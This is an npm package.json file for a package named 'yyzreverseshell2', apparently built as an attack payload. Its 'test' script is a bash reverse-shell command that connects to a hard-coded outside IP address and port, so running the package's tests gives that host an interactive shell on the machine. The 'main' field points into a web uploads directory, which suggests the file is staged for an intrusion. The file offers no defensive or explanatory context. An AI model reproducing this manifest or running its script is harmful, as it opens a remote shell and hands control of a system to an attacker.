{
  "name": "yyzreverseshell2",
  "version": "1.0.0",
  "description": "",
  "main": "/usr/local/app/public/app/public/uploads/test.js",
  "scripts": {
    "test": "bash -i >& /dev/tcp/121.4.80.209/2333 0>&1"
  },
  "author": "yyzsec",
  "license": "ISC"
}
